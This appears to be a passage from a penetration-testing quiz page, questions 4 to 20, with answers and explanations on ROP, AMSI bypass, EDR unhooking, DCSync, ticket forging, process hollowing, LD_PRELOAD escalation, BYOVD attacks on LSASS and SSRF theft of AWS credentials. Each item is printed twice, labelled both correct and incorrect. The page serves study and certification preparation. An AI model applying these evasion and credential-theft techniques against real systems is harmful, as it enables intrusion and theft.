4What is the primary purpose of constructing a Return-Oriented Programming (ROP) chain during exploit development?
CorrectC: Chaining together small, pre-existing snippets of executable machine code ("gadgets") already present in memory to execute arbitrary logic, thereby bypassing Data Execution Prevention (DEP/NX) which blocks execution on the stack.
DEP/NX prevents executing attacker-supplied shellcode on the stack by marking it non-executable. ROP bypasses this by chaining existing 'gadgets' β legitimate code snippets ending in a `ret` instruction β already present in executable memory regions (like loaded DLLs), effectively executing arbitrary logic without injecting new code.
IncorrectC: Chaining together small, pre-existing snippets of executable machine code ("gadgets") already present in memory to execute arbitrary logic, thereby bypassing Data Execution Prevention (DEP/NX) which blocks execution on the stack.
DEP/NX prevents executing attacker-supplied shellcode on the stack by marking it non-executable. ROP bypasses this by chaining existing 'gadgets' β legitimate code snippets ending in a `ret` instruction β already present in executable memory regions (like loaded DLLs), effectively executing arbitrary logic without injecting new code.
5Which of the following describes a common technique for bypassing the Windows Antimalware Scan Interface (AMSI)?
CorrectA: Patching or hooking the AmsiScanBuffer function in memory to force it to constantly return a "clean" (AMSI_RESULT_CLEAN) result to the calling process, allowing malicious PowerShell or C# to execute unhindered.
AMSI hooks into the PowerShell, .NET, and JScript engines to scan content before execution. The classic bypass patches `AmsiScanBuffer` in the current process's `amsi.dll` to alter its return value to 0 (AMSI_RESULT_CLEAN), making it approve all subsequent content regardless of maliciousness.
IncorrectA: Patching or hooking the AmsiScanBuffer function in memory to force it to constantly return a "clean" (AMSI_RESULT_CLEAN) result to the calling process, allowing malicious PowerShell or C# to execute unhindered.
AMSI hooks into the PowerShell, .NET, and JScript engines to scan content before execution. The classic bypass patches `AmsiScanBuffer` in the current process's `amsi.dll` to alter its return value to 0 (AMSI_RESULT_CLEAN), making it approve all subsequent content regardless of maliciousness.
6In the Cobalt Strike Command and Control (C2) framework, what is the function of a "Malleable C2 Profile"?
CorrectB: A configuration script that allows operators to highly customize the network indicators, beacon jitter/timing, and HTTP headers of their payload traffic to mimic legitimate applications and evade IDS/IPS detection.
Malleable C2 Profiles define how Cobalt Strike beacon traffic looks on the wire β HTTP headers, URIs, cookies, jitter timings, and data encoding. Operators can configure beacons to impersonate legitimate traffic (e.g., Microsoft Teams API calls, Google Analytics) to blend into normal traffic and defeat network-based detection.
IncorrectB: A configuration script that allows operators to highly customize the network indicators, beacon jitter/timing, and HTTP headers of their payload traffic to mimic legitimate applications and evade IDS/IPS detection.
Malleable C2 Profiles define how Cobalt Strike beacon traffic looks on the wire β HTTP headers, URIs, cookies, jitter timings, and data encoding. Operators can configure beacons to impersonate legitimate traffic (e.g., Microsoft Teams API calls, Google Analytics) to blend into normal traffic and defeat network-based detection.
7In the context of evading Endpoint Detection and Response (EDR) solutions, what does "Windows API Unhooking" achieve?
CorrectD: Reloading a clean, unadulterated copy of a system DLL (like ntdll.dll) directly from disk into memory to overwrite and bypass the user-land monitoring hooks placed by the EDR agent.
EDRs hook Windows API functions in user-land DLLs (especially ntdll.dll) by patching the function prologue with a JMP to their monitoring code. Unhooking loads a fresh, unmodified copy of the DLL directly from disk (bypassing the hooked version in memory) to restore clean syscall execution that the EDR cannot intercept.
IncorrectD: Reloading a clean, unadulterated copy of a system DLL (like ntdll.dll) directly from disk into memory to overwrite and bypass the user-land monitoring hooks placed by the EDR agent.
EDRs hook Windows API functions in user-land DLLs (especially ntdll.dll) by patching the function prologue with a JMP to their monitoring code. Unhooking loads a fresh, unmodified copy of the DLL directly from disk (bypassing the hooked version in memory) to restore clean syscall execution that the EDR cannot intercept.
8What is the underlying mechanism utilized in a DCSync attack?
CorrectC: Using the Directory Replication Service Remote Protocol (MS-DRSR) to impersonate a legitimate Domain Controller, requesting and extracting password hashes (including the KRBTGT hash) from the actual DC.
DCSync (Mimikatz lsadump::dcsync) abuses the MS-DRSR protocol, which Domain Controllers use to replicate data among themselves. An account with Replicating Directory Changes All permission can request password hash replication β allowing extraction of any domain account's hash, including KRBTGT, without touching LSASS.
IncorrectC: Using the Directory Replication Service Remote Protocol (MS-DRSR) to impersonate a legitimate Domain Controller, requesting and extracting password hashes (including the KRBTGT hash) from the actual DC.
DCSync (Mimikatz lsadump::dcsync) abuses the MS-DRSR protocol, which Domain Controllers use to replicate data among themselves. An account with Replicating Directory Changes All permission can request password hash replication β allowing extraction of any domain account's hash, including KRBTGT, without touching LSASS.
9What is the exact distinction between a Golden Ticket and a Silver Ticket in Active Directory exploitation?
CorrectD: A Golden Ticket is a forged TGT encrypted with the KRBTGT hash granting domain-wide access; a Silver Ticket is a forged TGS encrypted with a specific service account hash granting access only to that specific service.
A Golden Ticket forges a TGT using the KRBTGT account hash β since the KDC issues TGTs, forging one grants domain-wide access for up to 10 years. A Silver Ticket forges a TGS for a specific service using that service account's hash, bypassing the KDC entirely but limited to that one service.
IncorrectD: A Golden Ticket is a forged TGT encrypted with the KRBTGT hash granting domain-wide access; a Silver Ticket is a forged TGS encrypted with a specific service account hash granting access only to that specific service.
A Golden Ticket forges a TGT using the KRBTGT account hash β since the KDC issues TGTs, forging one grants domain-wide access for up to 10 years. A Silver Ticket forges a TGS for a specific service using that service account's hash, bypassing the KDC entirely but limited to that one service.
10What is a "DLL Search Order Hijacking" vulnerability?
CorrectC: Placing a malicious DLL in a directory that a vulnerable application searches first, causing the application to unknowingly load the attacker's code instead of the legitimate Windows DLL.
Windows searches for DLLs in a specific order: application directory β current directory β System32 β etc. If an application loads a DLL that doesn't exist in the application directory, and an attacker has write access to that directory, placing a malicious DLL with the matching name causes the application to load it instead.
IncorrectC: Placing a malicious DLL in a directory that a vulnerable application searches first, causing the application to unknowingly load the attacker's code instead of the legitimate Windows DLL.
Windows searches for DLLs in a specific order: application directory β current directory β System32 β etc. If an application loads a DLL that doesn't exist in the application directory, and an attacker has write access to that directory, placing a malicious DLL with the matching name causes the application to load it instead.
11What does the "Shadow Credentials" attack vector abuse in Active Directory?
CorrectA: Abusing the msDS-KeyCredentialLink attribute of a computer or user object to associate an attacker-controlled public key, allowing the attacker to request a Kerberos TGT (PKINIT) for that object.
Shadow Credentials (Whisker tool) abuses the msDS-KeyCredentialLink AD attribute used by Windows Hello for Business. With write access to this attribute on a user/computer object, an attacker adds their own public key β then uses PKINIT to authenticate as that object and obtain a TGT without knowing the password.
IncorrectA: Abusing the msDS-KeyCredentialLink attribute of a computer or user object to associate an attacker-controlled public key, allowing the attacker to request a Kerberos TGT (PKINIT) for that object.
Shadow Credentials (Whisker tool) abuses the msDS-KeyCredentialLink AD attribute used by Windows Hello for Business. With write access to this attribute on a user/computer object, an attacker adds their own public key β then uses PKINIT to authenticate as that object and obtain a TGT without knowing the password.
12How is a "Process Hollowing" injection technique executed by advanced malware?
CorrectB: Spawning a legitimate process in a suspended state, unmapping (hollowing) its original code from memory, replacing it with malicious shellcode, and resuming the execution thread to disguise the malware.
Process Hollowing (RunPE) creates a legitimate process (e.g., svchost.exe) in a SUSPENDED state, uses NtUnmapViewOfSection to hollow out its memory, writes malicious code in its place, adjusts the entry point, and resumes the thread. Process monitors see a legitimate process name hiding malicious code.
IncorrectB: Spawning a legitimate process in a suspended state, unmapping (hollowing) its original code from memory, replacing it with malicious shellcode, and resuming the execution thread to disguise the malware.
Process Hollowing (RunPE) creates a legitimate process (e.g., svchost.exe) in a SUSPENDED state, uses NtUnmapViewOfSection to hollow out its memory, writes malicious code in its place, adjusts the entry point, and resumes the thread. Process monitors see a legitimate process name hiding malicious code.
13In exploit development, what is a "NOP Sled" (No-Operation Sled) used for?
CorrectC: A sequence of "No Operation" (\x90) instructions used to pad a buffer overflow payload, ensuring that even if the jumped return address is slightly inaccurate, the CPU will "slide" down into the actual shellcode.
A NOP sled (`\x90\x90\x90...`) precedes shellcode in a buffer overflow exploit. Because memory addresses shift slightly due to environment variables and stack randomization, the NOP sled acts as a large target β if EIP/RIP lands anywhere within the sled, the CPU executes NOPs (do nothing) and slides into the shellcode.
IncorrectC: A sequence of "No Operation" (\x90) instructions used to pad a buffer overflow payload, ensuring that even if the jumped return address is slightly inaccurate, the CPU will "slide" down into the actual shellcode.
A NOP sled (`\x90\x90\x90...`) precedes shellcode in a buffer overflow exploit. Because memory addresses shift slightly due to environment variables and stack randomization, the NOP sled acts as a large target β if EIP/RIP lands anywhere within the sled, the CPU executes NOPs (do nothing) and slides into the shellcode.
14What makes an "Insecure Deserialization" vulnerability incredibly dangerous to web applications (e.g., via Ysoserial)?
CorrectD: An attacker manipulates a serialized data object so that when the application natively reconstructs (deserializes) it, it instantiates malicious objects or unexpectedly executes arbitrary code.
Many frameworks (Java, PHP, .NET) execute code during deserialization (gadget chains). Ysoserial generates serialized Java gadget chain payloads. When the application deserializes attacker-supplied data, the crafted object graph triggers method calls culminating in RCE β without any SQL injection or XSS.
IncorrectD: An attacker manipulates a serialized data object so that when the application natively reconstructs (deserializes) it, it instantiates malicious objects or unexpectedly executes arbitrary code.
Many frameworks (Java, PHP, .NET) execute code during deserialization (gadget chains). Ysoserial generates serialized Java gadget chain payloads. When the application deserializes attacker-supplied data, the crafted object graph triggers method calls culminating in RCE β without any SQL injection or XSS.
15How can the LD_PRELOAD environment variable be abused for Linux Privilege Escalation?
CorrectA: By setting the variable to force the dynamic linker to load an attacker-controlled shared library before any others, intercepting standard function calls (like geteuid()) when a vulnerable SUID binary is executed.
If a sudo rule allows a user to run a program with LD_PRELOAD preserved (env_keep += LD_PRELOAD), the attacker compiles a malicious shared library (containing a constructor calling setuid(0)/execve()) and sets LD_PRELOAD to its path before invoking the sudo command β causing the linker to load their library first and execute root code.
IncorrectA: By setting the variable to force the dynamic linker to load an attacker-controlled shared library before any others, intercepting standard function calls (like geteuid()) when a vulnerable SUID binary is executed.
If a sudo rule allows a user to run a program with LD_PRELOAD preserved (env_keep += LD_PRELOAD), the attacker compiles a malicious shared library (containing a constructor calling setuid(0)/execve()) and sets LD_PRELOAD to its path before invoking the sudo command β causing the linker to load their library first and execute root code.
16In penetration testing and cryptographic analysis, what is a "Side-Channel Attack"?
CorrectB: An attack that infers cryptographic keys or secrets by measuring physical implementation artifacts, such as execution time variations, power consumption, or electromagnetic emissions.
Side-channel attacks exploit physical information leakage from a cryptographic implementation rather than mathematical weaknesses in the algorithm itself. Examples include timing attacks (RSA key bits from decryption time variance), power analysis (AES key from CPU power traces), and SPECTRE/MELTDOWN (CPU cache timing).
IncorrectB: An attack that infers cryptographic keys or secrets by measuring physical implementation artifacts, such as execution time variations, power consumption, or electromagnetic emissions.
Side-channel attacks exploit physical information leakage from a cryptographic implementation rather than mathematical weaknesses in the algorithm itself. Examples include timing attacks (RSA key bits from decryption time variance), power analysis (AES key from CPU power traces), and SPECTRE/MELTDOWN (CPU cache timing).
17In AWS Cloud Pentesting, how is an SSRF vulnerability typically weaponized against an EC2 instance?
CorrectA: By forcing the vulnerable instance to query the internal AWS metadata service (169.254.169.254) to extract the temporary IAM security credentials attached to the instance role.
The AWS IMDSv1 metadata endpoint (169.254.169.254/latest/meta-data/iam/security-credentials/) returns temporary IAM role credentials when queried from any EC2 instance. An SSRF flaw allows an external attacker to bounce a request through the server to this endpoint, stealing credentials used to pivot within the AWS account.
IncorrectA: By forcing the vulnerable instance to query the internal AWS metadata service (169.254.169.254) to extract the temporary IAM security credentials attached to the instance role.
The AWS IMDSv1 metadata endpoint (169.254.169.254/latest/meta-data/iam/security-credentials/) returns temporary IAM role credentials when queried from any EC2 instance. An SSRF flaw allows an external attacker to bounce a request through the server to this endpoint, stealing credentials used to pivot within the AWS account.
18How do advanced threat actors typically bypass LSA Protection (RunAsPPL) to dump credentials from LSASS memory?
CorrectC: By utilizing a vulnerable, legitimately signed third-party driver (BYOVD attack) to execute kernel-mode code that systematically strips the protection flags from the LSASS process memory space.
RunAsPPL (Protected Process Light) prevents user-mode processes from reading LSASS memory. BYOVD (Bring Your Own Vulnerable Driver) abuses a legitimately signed but vulnerable driver (e.g., RTCore64.sys) to execute kernel-mode code that removes the PP/PPL protection flags from LSASS β allowing Mimikatz to dump it.
IncorrectC: By utilizing a vulnerable, legitimately signed third-party driver (BYOVD attack) to execute kernel-mode code that systematically strips the protection flags from the LSASS process memory space.
RunAsPPL (Protected Process Light) prevents user-mode processes from reading LSASS memory. BYOVD (Bring Your Own Vulnerable Driver) abuses a legitimately signed but vulnerable driver (e.g., RTCore64.sys) to execute kernel-mode code that removes the PP/PPL protection flags from LSASS β allowing Mimikatz to dump it.
19What is the fundamental mechanism of an "HTTP Request Smuggling" (CL.TE / TE.CL) attack?
CorrectD: Exploiting discrepancies in how front-end proxies and back-end servers parse the Content-Length and Transfer-Encoding headers, allowing an attacker to "smuggle" a hidden, secondary request into the back-end.
HTTP Request Smuggling exploits inconsistent parsing between a front-end proxy and back-end server. In CL.TE, the front-end uses Content-Length while the back-end uses Transfer-Encoding. The attacker crafts a request where the discrepancy 'smuggles' a hidden request prefix that the back-end prepends to the next legitimate user's request.
IncorrectD: Exploiting discrepancies in how front-end proxies and back-end servers parse the Content-Length and Transfer-Encoding headers, allowing an attacker to "smuggle" a hidden, secondary request into the back-end.
HTTP Request Smuggling exploits inconsistent parsing between a front-end proxy and back-end server. In CL.TE, the front-end uses Content-Length while the back-end uses Transfer-Encoding. The attacker crafts a request where the discrepancy 'smuggles' a hidden request prefix that the back-end prepends to the next legitimate user's request.
20What is "Token Impersonation" in the context of Windows post-exploitation?
CorrectB: Exploiting elevated privileges (like SeImpersonatePrivilege or SeDebugPrivilege) to duplicate the access token of a higher-privileged process (like SYSTEM) and applying it to the attacker's active thread or process.
Windows access tokens define the security context of a process/thread. With SeImpersonatePrivilege or SeDebugPrivilege, a lower-privileged attacker can use DuplicateTokenEx() and ImpersonateLoggedOnUser() (or Incognito/Metasploit's steal_token) to clone a SYSTEM token and apply it, effectively running as SYSTEM.
IncorrectB: Exploiting elevated privileges (like SeImpersonatePrivilege or SeDebugPrivilege) to duplicate the access token of a higher-privileged process (like SYSTEM) and applying it to the attacker's active thread or process.
Windows access tokens define the security context of a process/thread. With SeImpersonatePrivilege or SeDebugPrivilege, a lower-privileged attacker can use DuplicateTokenEx() and ImpersonateLoggedOnUser() (or Incognito/Metasploit's steal_token) to clone a SYSTEM token and apply it, effectively running as SYSTEM.
Key Takeaways β Penetration Testing
- PT Phases: Reconnaissance β Scanning β Enumeration β Exploitation β Post-Exploitation β Reporting.
- Rules of Engagement (RoE): A legally binding agreement defining scoped targets, testing windows, and restricted techniques.
- Testing Methodologies: Black-box simulates external threat actors; gray-box provides partial credentials; white-box tests with full structural knowledge.
- Exploitation & Privilege Escalation: Gaining access is initial; privilege escalation (SUID, DLL hijacking) proves structural risk.
- Post-Exploitation Proof: Exfiltrating dummy data and performing lateral movement (pass-the-hash, DCSync) demonstrates true business impact.
- Risk Prioritization in Reports: The primary pentest deliverable is an actionable report with severity mapped by CVSS metrics.
Quick Review & Summary
Use this summary table to consolidate key concepts before or after attempting the questions above.
| PT Phase | Goal | Techniques |
|---|---|---|
| Reconnaissance | Gather target intelligence | Passive OSINT, WHOIS, public code repositories |
| Scanning | Discover active services & ports | Nmap stealth scans, banner grabbing, version detection |
| Enumeration | Perform detailed query maps | SNMP polling, Active Directory LDAP queries, share enum |
| Exploitation | Establish initial footprint | Credential spraying, buffer overflow, software exploits |
| Post-Exploitation | Demonstrate lateral propagation | Privilege escalation, pass-the-hash, Kerberoasting |
| Reporting | Document technical risk ratings | CVSS severity calculations, remediation timelines |
Frequently Asked Questions
Q. What is penetration testing?
Q. What are the phases of a penetration test?
Q. What is the difference between black-box, white-box, and grey-box testing?
Q. What is the scope in a penetration test and why does it matter?
Q. What is a CVE and how is it used in penetration testing?
Q. What tools are commonly used in penetration testing?
Q. What is the difference between a vulnerability assessment and a penetration test?
Struggling with some questions? Re-read the full Theory Guide: Penetration Testing
Conclusion: Penetration Testing as Controlled Attack
Penetration testing simulates real-world attacks within agreed Rules of Engagement to proactively surface vulnerabilities. These 60 MCQs span reconnaissance, active scanning, exploitation, privilege escalation, post-exploitation lateral movement, and professional reporting.
The best way to ensure retention is combining MCQ practice + theory review + interview preparation. Use these questions in Study Mode to learn concepts immediately, then test yourself in Exam Mode for certification and interview readiness.
After completing this MCQ set, explore our penetration testing interview questions for deeper technical discussions, and review the full theory notes for detailed explanations of each concept covered here.